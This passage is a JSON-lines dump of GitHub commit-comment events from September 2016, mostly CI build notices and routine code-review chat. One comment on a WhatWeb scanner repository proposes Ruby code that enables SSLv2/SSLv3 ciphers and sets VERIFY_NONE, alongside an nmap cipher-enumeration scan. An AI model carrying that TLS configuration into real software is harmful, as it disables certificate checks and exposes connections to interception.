href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a9714483ac527ec3f65b9c135bae8717851e403-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a9714483ac527ec3f65b9c135bae8717851e403-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-77.34%25-red.svg)</a> \n"}},"created_at":"2016-09-29T15:44:21Z"}
{"id":"4638114018","type":"CommitCommentEvent","actor":{"login":"captbaritone"},"repo":{"name":"captbaritone/winamp2-js"},"payload":{"comment":{"id":19226169,"position":null,"line":null,"path":null,"commit_id":"91af5f1430ea31e417b1f2b6778f4695988f7d27","created_at":"2016-09-29T15:45:11Z","updated_at":"2016-09-29T15:45:11Z","body":"Somehow this commit causes Safair (both osx and ios) to crash when a track finishes playing."}},"created_at":"2016-09-29T15:45:11Z"}
{"id":"4638119531","type":"CommitCommentEvent","actor":{"login":"kito2"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19226184,"position":null,"line":null,"path":null,"commit_id":"57aacb1b7d525965d5aa14bc0639b32c36aab8ed","created_at":"2016-09-29T15:46:00Z","updated_at":"2016-09-29T15:46:00Z","body":"As far as I know they have changed some Icons on the client.\r\n\r\nWhere are those updates at source, any modifications since 10.96?"}},"created_at":"2016-09-29T15:46:00Z"}
{"id":"4638123850","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19226190,"position":null,"line":null,"path":null,"commit_id":"b5ca455258a17004b331756b5d1354a5bb7d4486","created_at":"2016-09-29T15:46:39Z","updated_at":"2016-09-29T15:46:39Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1209](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14603&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 259, ignored: 3 Build time: 00:11:39"}},"created_at":"2016-09-29T15:46:39Z"}
{"id":"4638132326","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19226210,"position":null,"line":null,"path":null,"commit_id":"1a9714483ac527ec3f65b9c135bae8717851e403","created_at":"2016-09-29T15:47:56Z","updated_at":"2016-09-29T15:47:56Z","body":"input_processor_refactor (mbadams5) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a9714483ac527ec3f65b9c135bae8717851e403-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-29T15:47:56Z"}
{"id":"4638132696","type":"CommitCommentEvent","actor":{"login":"estellecomment"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19226211,"position":62,"line":221,"path":"static/js/controllers/contacts-content.js","commit_id":"a19b9b1aa01aae6768d64113dd31ef4b0e161224","created_at":"2016-09-29T15:47:59Z","updated_at":"2016-09-29T15:47:59Z","body":"I have no idea. I can change it if it sound too wrong, lemme know whether you actually care enough."}},"created_at":"2016-09-29T15:47:59Z"}
{"id":"4638133072","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19226213,"position":null,"line":null,"path":null,"commit_id":"b5ca455258a17004b331756b5d1354a5bb7d4486","created_at":"2016-09-29T15:48:03Z","updated_at":"2016-09-29T15:48:03Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1210](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14611&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-29T15:48:03Z"}
{"id":"4638133598","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19226214,"position":null,"line":null,"path":null,"commit_id":"eddc8207361c3b312b455d6c01afe57c1f13157e","created_at":"2016-09-29T15:48:08Z","updated_at":"2016-09-29T15:48:08Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1211](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14612&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-29T15:48:08Z"}
{"id":"4638134455","type":"CommitCommentEvent","actor":{"login":"ashwanthkumar"},"repo":{"name":"indix/matsya"},"payload":{"comment":{"id":19226216,"position":46,"line":46,"path":"src/main/scala/in/ashwanthkumar/matsya/config/Config.scala","commit_id":"ff8a4d125cefadc9bc92ec3ddaf5e7e5876dc8b5","created_at":"2016-09-29T15:48:15Z","updated_at":"2016-09-29T15:48:15Z","body":"Oh, I'm sorry :( Let me fix it for you. "}},"created_at":"2016-09-29T15:48:15Z"}
{"id":"4638135269","type":"CommitCommentEvent","actor":{"login":"jackregnart"},"repo":{"name":"finddx/cdx"},"payload":{"comment":{"id":19226221,"position":null,"line":null,"path":null,"commit_id":"6d581ba6aa4d08aa357d868fd1205f0898e78fd6","created_at":"2016-09-29T15:48:23Z","updated_at":"2016-09-29T15:48:23Z","body":"So what's the deal with permissions on the CSV exports? Like in `cdx_core/app/controllers/test_orders_state_controller ` ?"}},"created_at":"2016-09-29T15:48:23Z"}
{"id":"4638143288","type":"CommitCommentEvent","actor":{"login":"sandraorchard"},"repo":{"name":"sandraorchard/darkspaceproject"},"payload":{"comment":{"id":19226242,"position":null,"line":null,"path":null,"commit_id":"7bdfa2f345c4fc97a7f094efa6518a6a85bd8072","created_at":"2016-09-29T15:49:36Z","updated_at":"2016-09-29T15:49:36Z","body":"Elm/Switches interaction pairs\r\nPDB complexes (we have list)\r\n"}},"created_at":"2016-09-29T15:49:36Z"}
{"id":"4638149760","type":"CommitCommentEvent","actor":{"login":"chrisseaton"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19226252,"position":null,"line":null,"path":null,"commit_id":"4b5ec2629a037b2b1aed1a2a1172aaf6debbed4a","created_at":"2016-09-29T15:50:35Z","updated_at":"2016-09-29T15:50:35Z","body":"We shouldn't normally have to use a non-release version of Truffle, but we fixed some other problem by making Graal use our version of Truffle, but that's no longer compatible with the compiler, so we have to update our version to match... it's a treadmill of updates and bad fixes."}},"created_at":"2016-09-29T15:50:35Z"}
{"id":"4638158109","type":"CommitCommentEvent","actor":{"login":"ashwanthkumar"},"repo":{"name":"indix/matsya"},"payload":{"comment":{"id":19226265,"position":46,"line":46,"path":"src/main/scala/in/ashwanthkumar/matsya/config/Config.scala","commit_id":"ff8a4d125cefadc9bc92ec3ddaf5e7e5876dc8b5","created_at":"2016-09-29T15:51:51Z","updated_at":"2016-09-29T15:51:51Z","body":"Just realised this is not used at all. We use the SDK's default mechanism of picking up the region. This shouldn't affect you even if you're operating from a different region. Is this causing any issues for you? "}},"created_at":"2016-09-29T15:51:51Z"}
{"id":"4638159615","type":"CommitCommentEvent","actor":{"login":"Mysterium"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19226267,"position":null,"line":null,"path":null,"commit_id":"c6f662630b7c61564bf1c1fbcdc905f1134f2faf","created_at":"2016-09-29T15:52:04Z","updated_at":"2016-09-29T15:52:04Z","body":"It's httpS. And can you all register on the forum? So i can all give the rights"}},"created_at":"2016-09-29T15:52:04Z"}
{"id":"4638163148","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"team-PowerSpace/PowerSpace"},"payload":{"comment":{"id":19226275,"position":11,"line":11,"path":"PowerSpace/Common/Stage.h","commit_id":"dce27e8d79d6f7f22856f0fc9bcf8c6b4fbceabf","created_at":"2016-09-29T15:52:32Z","updated_at":"2016-09-29T15:52:32Z","body":"ссылку забыли?"}},"created_at":"2016-09-29T15:52:32Z"}
{"id":"4638169673","type":"CommitCommentEvent","actor":{"login":"apren"},"repo":{"name":"wymsee/cordova-imagePicker"},"payload":{"comment":{"id":19226286,"position":null,"line":null,"path":null,"commit_id":"22f843bdac4f430feb7a49ab418e93256f314d9f","created_at":"2016-09-29T15:53:31Z","updated_at":"2016-09-29T15:53:31Z","body":"Spanish text:\r\n\r\n<string name=\"processing_images_header\">Procesando imágenes</string>\r\n<string name=\"processing_images_message\">Esto puede tardar un poco.</string>\r\n<string name=\"maximum_selection_count_error_header\">Límite alcanzado.</string>\r\n<string name=\"maximum_selection_count_error_message\">Sólo puedes seleccionar %d fotos a la vez.</string>"}},"created_at":"2016-09-29T15:53:31Z"}
{"id":"4638169831","type":"CommitCommentEvent","actor":{"login":"burningice2866"},"repo":{"name":"Orckestra/CMS-Foundation"},"payload":{"comment":{"id":19226288,"position":null,"line":null,"path":null,"commit_id":"711f2887537112eb269b0704acc18830f1fd067c","created_at":"2016-09-29T15:53:32Z","updated_at":"2016-09-29T15:53:32Z","body":"Would be nice if we can take the Console Permissions for the different page types into account here.\r\n\r\nHas been suggested here http://orckestracms.codeplex.com/workitem/1680"}},"created_at":"2016-09-29T15:53:32Z"}
{"id":"4638170954","type":"CommitCommentEvent","actor":{"login":"FacundoAdorno"},"repo":{"name":"FacundoAdorno/GitTest"},"payload":{"comment":{"id":19226290,"position":null,"line":null,"path":null,"commit_id":"2141e220258665fc666513b8ef85141205101324","created_at":"2016-09-29T15:53:43Z","updated_at":"2016-09-29T15:53:43Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Hola](https://trello.com/c/5h7x8OH0/2-hola)"}},"created_at":"2016-09-29T15:53:43Z"}
{"id":"4638178104","type":"CommitCommentEvent","actor":{"login":"ashwanthkumar"},"repo":{"name":"indix/matsya"},"payload":{"comment":{"id":19226302,"position":46,"line":46,"path":"src/main/scala/in/ashwanthkumar/matsya/config/Config.scala","commit_id":"ff8a4d125cefadc9bc92ec3ddaf5e7e5876dc8b5","created_at":"2016-09-29T15:54:46Z","updated_at":"2016-09-29T15:54:46Z","body":"Removed the misleading unused property as part of https://github.com/indix/matsya/commit/ebd5979f03bdfc3a0a10ddfdb4e861b4394e6712"}},"created_at":"2016-09-29T15:54:46Z"}
{"id":"4638179493","type":"CommitCommentEvent","actor":{"login":"Bodeguero"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19226309,"position":null,"line":null,"path":null,"commit_id":"c6f662630b7c61564bf1c1fbcdc905f1134f2faf","created_at":"2016-09-29T15:54:58Z","updated_at":"2016-09-29T15:54:58Z","body":"@Mysterium The website will open in the same way as much as https to http or without this it will be redirected to the forum! In a moment I'll create an account on the forum too!"}},"created_at":"2016-09-29T15:54:58Z"}
{"id":"4638180195","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19226312,"position":null,"line":null,"path":null,"commit_id":"3babac381a229f83e49fa7d8fdb408d856b9d377","created_at":"2016-09-29T15:55:05Z","updated_at":"2016-09-29T15:55:05Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1212](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14614&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-29T15:55:05Z"}
{"id":"4638185672","type":"CommitCommentEvent","actor":{"login":"sameo"},"repo":{"name":"devimc/hyperstart"},"payload":{"comment":{"id":19226319,"position":13,"line":517,"path":"src/container.c","commit_id":"b9ad88e2ce29186c03e89e56e219e390bac89248","created_at":"2016-09-29T15:55:52Z","updated_at":"2016-09-29T15:55:52Z","body":"Add that one to `int setup_dns, ret;`"}},"created_at":"2016-09-29T15:55:52Z"}
{"id":"4638186789","type":"CommitCommentEvent","actor":{"login":"brauliobo"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":19226325,"position":null,"line":null,"path":null,"commit_id":"91fd6510563f84ee473bb217bc63ed598abe3f24","created_at":"2016-09-29T15:56:01Z","updated_at":"2016-09-29T15:56:01Z","body":"I think this bug is still in 4.2.7!"}},"created_at":"2016-09-29T15:56:01Z"}
{"id":"4638189607","type":"CommitCommentEvent","actor":{"login":"gidili"},"repo":{"name":"openworm/org.geppetto.frontend"},"payload":{"comment":{"id":19226335,"position":15,"line":1077,"path":"src/main/webapp/js/components/dev/query/query.js","commit_id":"c4f013894c4c756f279840ef86e4e4c17b85f37f","created_at":"2016-09-29T15:56:27Z","updated_at":"2016-09-29T15:56:27Z","body":"@jrmartin I refactored this a tiny bit - map returns an array and it can be just assigned 👍 "}},"created_at":"2016-09-29T15:56:27Z"}
{"id":"4638189715","type":"CommitCommentEvent","actor":{"login":"korymath"},"repo":{"name":"SeanNaren/torch-twrl"},"payload":{"comment":{"id":19226336,"position":null,"line":null,"path":null,"commit_id":"2db64abb1b8dfcbc4898a78de502a4a987fcfdcf","created_at":"2016-09-29T15:56:28Z","updated_at":"2016-09-29T15:56:28Z","body":"Great work, love how this is coming along."}},"created_at":"2016-09-29T15:56:28Z"}
{"id":"4638190788","type":"CommitCommentEvent","actor":{"login":"Patabugen"},"repo":{"name":"Julienh/Sharrre"},"payload":{"comment":{"id":19226340,"position":null,"line":null,"path":null,"commit_id":"c5c9462ee33190912ad3de42e6c001bff3c4b780","created_at":"2016-09-29T15:56:37Z","updated_at":"2016-09-29T15:56:37Z","body":"Out of interest - why does this use https rather than not specifying the protocol at all?"}},"created_at":"2016-09-29T15:56:37Z"}
{"id":"4638195313","type":"CommitCommentEvent","actor":{"login":"fadookie"},"repo":{"name":"otusweb/xCode-test-bundle-builder-for-bitrise"},"payload":{"comment":{"id":19226357,"position":111,"line":111,"path":"step.sh","commit_id":"4a3334eda91dfe504f63ce07e741ed4040fcf6da","created_at":"2016-09-29T15:57:19Z","updated_at":"2016-09-29T15:57:19Z","body":"I think this regex might break for future Xcode versions >= 10.x."}},"created_at":"2016-09-29T15:57:19Z"}
{"id":"4638195395","type":"CommitCommentEvent","actor":{"login":"devimc"},"repo":{"name":"devimc/hyperstart"},"payload":{"comment":{"id":19226358,"position":13,"line":517,"path":"src/container.c","commit_id":"b9ad88e2ce29186c03e89e56e219e390bac89248","created_at":"2016-09-29T15:57:20Z","updated_at":"2016-09-29T15:57:20Z","body":"done"}},"created_at":"2016-09-29T15:57:20Z"}
{"id":"4638199151","type":"CommitCommentEvent","actor":{"login":"Mysterium"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19226365,"position":null,"line":null,"path":null,"commit_id":"c6f662630b7c61564bf1c1fbcdc905f1134f2faf","created_at":"2016-09-29T15:57:53Z","updated_at":"2016-09-29T15:57:53Z","body":"Oh, you right xD\r\nI dont know if IPS forum is better for this project.. i have only experience in wbb"}},"created_at":"2016-09-29T15:57:53Z"}
{"id":"4638200632","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"volodden/YaPyN_Editor"},"payload":{"comment":{"id":19226369,"position":15,"line":24,"path":"README.md","commit_id":"d194c492f65fbadd8c02114333cf319dc3a82123","created_at":"2016-09-29T15:58:06Z","updated_at":"2016-09-29T15:58:06Z","body":"This board may be private. If someone gave you this link, they may need to invite you to one of their boards or teams.\r\nhttps://trello.com/atwice"}},"created_at":"2016-09-29T15:58:06Z"}
{"id":"4638201003","type":"CommitCommentEvent","actor":{"login":"Bodeguero"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19226371,"position":null,"line":null,"path":null,"commit_id":"c4bffc70ebff5f1ef999475037817aef77f08a3b","created_at":"2016-09-29T15:58:09Z","updated_at":"2016-09-29T15:58:09Z","body":"Thanks for @Mysterium "}},"created_at":"2016-09-29T15:58:09Z"}
{"id":"4638203267","type":"CommitCommentEvent","actor":{"login":"ScarXLXX"},"repo":{"name":"iblobtouch/iblobtouch.github.io"},"payload":{"comment":{"id":19226376,"position":null,"line":null,"path":null,"commit_id":"f260e1fcf64cc07d31ae11dc646579ebe2d36590","created_at":"2016-09-29T15:58:27Z","updated_at":"2016-09-29T15:58:27Z","body":"Awesome!\r\nAny plans for adding turrets or more barrel types?"}},"created_at":"2016-09-29T15:58:27Z"}
{"id":"4638204123","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19226380,"position":null,"line":null,"path":null,"commit_id":"b5ca455258a17004b331756b5d1354a5bb7d4486","created_at":"2016-09-29T15:58:34Z","updated_at":"2016-09-29T15:58:34Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1210](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14611&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 259, ignored: 3 Build time: 00:10:31"}},"created_at":"2016-09-29T15:58:34Z"}
{"id":"4638204615","type":"CommitCommentEvent","actor":{"login":"milo2012"},"repo":{"name":"milo2012/WhatWeb"},"payload":{"comment":{"id":19226381,"position":null,"line":null,"path":null,"commit_id":"216317634877863070567c2bfbae81c081b6d91b","created_at":"2016-09-29T15:58:38Z","updated_at":"2016-09-29T15:58:38Z","body":"Fix for website, only using TLSv1 and not other ciphers, whatsweb doesn't seem to be work on them.\r\n\r\n$ ./whatweb -a 3 https://vpn.xxx.com:443  \r\n**https://vpn.xxx.com:443 ERROR: SSL_connect returned=1 errno=0 state=SSLv2/v3 read server hello A: sslv3 alert handshake failure**\r\n\r\n$ nmap --script ssl-enum-ciphers -p 443 xxx.com\r\n443/tcp open  https\r\n| ssl-enum-ciphers: \r\n|   TLSv1.0: \r\n|     ciphers: \r\n|       TLS_RSA_WITH_3DES_EDE_CBC_SHA (rsa 2048) - C\r\n|     compressors: \r\n|       NULL\r\n|     cipher preference: indeterminate\r\n|     cipher preference error: Too few ciphers supported\r\n|_  least strength: C\r\n\r\n\r\n#The fix\r\nLine 152\r\n      if @uri.class == URI::HTTPS\r\n        http.use_ssl = true\r\n        OpenSSL::SSL::SSLContext::DEFAULT_PARAMS[:ciphers] = \"TLSv1:TLSv1.1:TLSv1.2:SSLv3:SSLv2\"\r\n        http.verify_mode = OpenSSL::SSL::VERIFY_NONE\r\n      end\r\n"}},"created_at":"2016-09-29T15:58:38Z"}
{"id":"4638208579","type":"CommitCommentEvent","actor":{"login":"LinusU"},"repo":{"name":"evanw/node-source-map-support"},"payload":{"comment":{"id":19226391,"position":5,"line":33,"path":"source-map-support.js","commit_id":"f6427b9ec70e066900bb30708f3735ff6bcf1e50","created_at":"2016-09-29T15:59:14Z","updated_at":"2016-09-29T15:59:14Z","body":"I think it would be best to open a separate issue about your specific situation :)"}},"created_at":"2016-09-29T15:59:14Z"}
{"id":"4638210058","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19226397,"position":null,"line":null,"path":null,"commit_id":"eddc8207361c3b312b455d6c01afe57c1f13157e","created_at":"2016-09-29T15:59:26Z","updated_at":"2016-09-29T15:59:26Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1211](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14612&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 259, ignored: 3 Build time: 00:11:18"}},"created_at":"2016-09-29T15:59:26Z"}
{"id":"4638211113","type":"CommitCommentEvent","actor":{"login":"laz2727"},"repo":{"name":"malte0811/IndustrialWires"},"payload":{"comment":{"id":19226399,"position":null,"line":null,"path":null,"commit_id":"c6c0bb00c9fd27f9c22b6c15f1fd5b35a551db4e","created_at":"2016-09-29T15:59:34Z","updated_at":"2016-09-29T15:59:34Z","body":"I'm pretty sure you cannot GPL a mod - it requires everything it depends on to be at least GPL(including Minecraft itself)."}},"created_at":"2016-09-29T15:59:34Z"}
{"id":"4638218202","type":"CommitCommentEvent","actor":{"login":"AgentTelme"},"repo":{"name":"Telmetrics/Plato.NET"},"payload":{"comment":{"id":19226411,"position":null,"line":null,"path":null,"commit_id":"c19a915d58da0f5c7e72ba17db2cc89cc7a2344c","created_at":"2016-09-29T16:00:38Z","updated_at":"2016-09-29T16:00:38Z","body":"TeamCity Shared Libraries :: Plato.NET :: CI [Build 5.0.0.76](http://devbuildmngr.dev.com/viewLog.html?buildId=130416&buildTypeId=Shared_PlatoNet_Ci) is now running\n"}},"created_at":"2016-09-29T16:00:38Z"}
{"id":"4638223455","type":"CommitCommentEvent","actor":{"login":"AgentTelme"},"repo":{"name":"Telmetrics/Plato.NET"},"payload":{"comment":{"id":19226433,"position":null,"line":null,"path":null,"commit_id":"c19a915d58da0f5c7e72ba17db2cc89cc7a2344c","created_at":"2016-09-29T16:01:23Z","updated_at":"2016-09-29T16:01:23Z","body":"TeamCity Shared Libraries :: Plato.NET :: CI [Build 5.0.0.76.c19a915](http://devbuildmngr.dev.com/viewLog.html?buildId=130416&buildTypeId=Shared_PlatoNet_Ci) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:45"}},"created_at":"2016-09-29T16:01:23Z"}
{"id":"4638225603","type":"CommitCommentEvent","actor":{"login":"binki"},"repo":{"name":"binki/autoserve"},"payload":{"comment":{"id":19226439,"position":12,"line":17,"path":"index.js","commit_id":"cbccaf2ac55fa172c59891a9648dd45ab1ec1ded","created_at":"2016-09-29T16:01:42Z","updated_at":"2016-09-29T16:01:42Z","body":"I think I was originally avoiding that because you didn’t want to add such a thing to `node-fastcgi` itself :-p. I mean, `autoserve` is trying to do the same thing by promising to pass apps an `http.ClientRequest`-like object but it also aims to provide `getBaseUrl()` and that is scoped to `http.ClientRequest`, so I think that if `http.Server` ever supported serving at a URI other than `/` it would include that information in `http.ClientRequest`.\r\n\r\nIf I am going to do my best to guess at how `http.ClientRequest` would do it, based on [`http.IncomingMessage.url`](https://nodejs.org/api/http.html#http_message_url), I think I would just set a property `baseUrl`. If I do that, I would need to make `express-autoserve` wrangle that (because apparently setting that confuses Express even though Express sets that itself on its own `http.ClientRequest`-like object). But I guess this is the best/least ugly path and gets rid of that ugly `detectedPlatform` variable. I’ll put that on my list of fixes to do and make sure I remember to bump MAJOR on next release ;-)."}},"created_at":"2016-09-29T16:01:42Z"}
{"id":"4638226870","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19226446,"position":null,"line":null,"path":null,"commit_id":"efc13a2ad7f190c14665f55d4a696215f86f72bb","created_at":"2016-09-29T16:01:55Z","updated_at":"2016-09-29T16:01:55Z","body":"We still use old graph in user stat ?\r\n"}},"created_at":"2016-09-29T16:01:55Z"}
{"id":"4638229461","type":"CommitCommentEvent","actor":{"login":"sautin1"},"repo":{"name":"team-PowerSpace/PowerSpace"},"payload":{"comment":{"id":19226457,"position":11,"line":11,"path":"PowerSpace/Common/Stage.h","commit_id":"dce27e8d79d6f7f22856f0fc9bcf8c6b4fbceabf","created_at":"2016-09-29T16:02:18Z","updated_at":"2016-09-29T16:02:18Z","body":"Да, спасибо, пропустил здесь замену IDrawable на IDrawablePtr. В следующем коммите поправлю."}},"created_at":"2016-09-29T16:02:18Z"}
{"id":"4638232071","type":"CommitCommentEvent","actor":{"login":"JohanEngelen"},"repo":{"name":"weka-io/ldc"},"payload":{"comment":{"id":19226465,"position":24,"line":111,"path":"driver/linker.cpp","commit_id":"c1fadc936a12ce544064f94912daeee4c36079b7","created_at":"2016-09-29T16:02:42Z","updated_at":"2016-09-29T16:02:42Z","body":"it's what we pass to LLVM for machine codegen (targetmachine). \r\nBut codeGenOptLevel is not really set correctly (-O1 will return ::Default instead of llvm::CodeGenOpt::Level::Less is never returned), if that's a bug, it's separate from LTO.\r\n\r\nIn any case, this is all WIP and will get a second read anyway.\r\n\r\nGetting LTO to work on Mac was easy. On Linux, not so much. Module constructors are not called somehow."}},"created_at":"2016-09-29T16:02:42Z"}
{"id":"4638232117","type":"CommitCommentEvent","actor":{"login":"huangjuanyu"},"repo":{"name":"huangjuanyu/slowtime"},"payload":{"comment":{"id":19226466,"position":null,"line":null,"path":null,"commit_id":"2e57fac7919528515bc04a6dd3dc969d5b48a798","created_at":"2016-09-29T16:02:43Z","updated_at":"2016-09-29T16:02:43Z","body":"修改了拉伸导航的代码"}},"created_at":"2016-09-29T16:02:43Z"}
{"id":"4638235221","type":"CommitCommentEvent","actor":{"login":"mrexodia"},"repo":{"name":"x64dbg/docs"},"payload":{"comment":{"id":19226479,"position":null,"line":null,"path":null,"commit_id":"10d2874b51319330b218eb9930da22a9e309bc6d","created_at":"2016-09-29T16:03:13Z","updated_at":"2016-09-29T16:03:13Z","body":"The command has been renamed from `GetTickCount` to `gettickcount` because `GetTickCount` should be resolved to the address of `GetTickCount`."}},"created_at":"2016-09-29T16:03:13Z"}
{"id":"4638239378","type":"CommitCommentEvent","actor":{"login":"mrkmg"},"repo":{"name":"andrewkarpich/laravel-elixir-pug"},"payload":{"comment":{"id":19226491,"position":null,"line":null,"path":null,"commit_id":"a9ce867a98824002af44c72908f4ea1a30d30841","created_at":"2016-09-29T16:03:53Z","updated_at":"2016-09-29T16:03:53Z","body":"I was sure hoping that the pug team releases 2.0.0 before too long so this was an issue for people..."}},"created_at":"2016-09-29T16:03:53Z"}
{"id":"4638241661","type":"CommitCommentEvent","actor":{"login":"sameo"},"repo":{"name":"devimc/hyperstart"},"payload":{"comment":{"id":19226496,"position":null,"line":null,"path":null,"commit_id":"f8d7adcc72d6f9b0355f1165dc3bfb71deee9609","created_at":"2016-09-29T16:04:14Z","updated_at":"2016-09-29T16:04:14Z","body":"Looks good to me."}},"created_at":"2016-09-29T16:04:14Z"}
{"id":"4638242049","type":"CommitCommentEvent","actor":{"login":"klickverbot"},"repo":{"name":"weka-io/ldc"},"payload":{"comment":{"id":19226497,"position":24,"line":111,"path":"driver/linker.cpp","commit_id":"c1fadc936a12ce544064f94912daeee4c36079b7","created_at":"2016-09-29T16:04:17Z","updated_at":"2016-09-29T16:04:17Z","body":"LTO is not just about machine codegen, but about running the actual \"middle-end\" optimiser."}},"created_at":"2016-09-29T16:04:17Z"}
{"id":"4638243959","type":"CommitCommentEvent","actor":{"login":"danielqv34"},"repo":{"name":"EliezerMdz/PrimerParcialOS01"},"payload":{"comment":{"id":19226501,"position":null,"line":null,"path":null,"commit_id":"843082856f9d05573afc599ddba376f5bb1aec65","created_at":"2016-09-29T16:04:35Z","updated_at":"2016-09-29T16:04:35Z","body":"Borrar los archvos de Intellij"}},"created_at":"2016-09-29T16:04:35Z"}
{"id":"4638245648","type":"CommitCommentEvent","actor":{"login":"fadookie"},"repo":{"name":"otusweb/xCode-test-bundle-builder-for-bitrise"},"payload":{"comment":{"id":19226507,"position":5,"line":5,"path":"step.sh","commit_id":"4a3334eda91dfe504f63ce07e741ed4040fcf6da","created_at":"2016-09-29T16:04:52Z","updated_at":"2016-09-29T16:04:52Z","body":"Might also want to `set -o pipefail` (see https://sipb.mit.edu/doc/safe-shell/)\r\nAlso, `set -o nounset` is good to leave on (except in places where you are manually checking if a variable is set before using it)"}},"created_at":"2016-09-29T16:04:52Z"}
{"id":"4638246184","type":"CommitCommentEvent","actor":{"login":"gidili"},"repo":{"name":"openworm/org.geppetto.frontend"},"payload":{"comment":{"id":19226508,"position":7,"line":217,"path":"src/main/webapp/js/tests/casperjs/geppetto-tests.js","commit_id":"a8bae8571e3d5351dd9801b75c43d503c32c94b0","created_at":"2016-09-29T16:04:57Z","updated_at":"2016-09-29T16:04:57Z","body":"@jrmartin is this needed? are we not using jquery everywhere in the casper tests already? cc: @slarson "}},"created_at":"2016-09-29T16:04:57Z"}
{"id":"4638249883","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19226519,"position":null,"line":null,"path":null,"commit_id":"3babac381a229f83e49fa7d8fdb408d856b9d377","created_at":"2016-09-29T16:05:33Z","updated_at":"2016-09-29T16:05:33Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1212](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14614&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 259, ignored: 3 Build time: 00:10:28"}},"created_at":"2016-09-29T16:05:33Z"}
{"id":"4638249906","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19226520,"position":null,"line":null,"path":null,"commit_id":"1d4db3c56131473423c387d6d51114742dd0028e","created_at":"2016-09-29T16:05:33Z","updated_at":"2016-09-29T16:05:33Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1213](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14618&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-29T16:05:33Z"}
{"id":"4638252394","type":"CommitCommentEvent","actor":{"login":"dhalperi"},"repo":{"name":"jkff/incubator-beam"},"payload":{"comment":{"id":19226526,"position":7,"line":265,"path":"sdks/java/io/google-cloud-platform/pom.xml","commit_id":"96993124741516e6562e347d3f5fec8cadb04798","created_at":"2016-09-29T16:05:55Z","updated_at":"2016-09-29T16:05:55Z","body":"versions ought to only go in top level pom -- need to add to dependency management if not there."}},"created_at":"2016-09-29T16:05:55Z"}
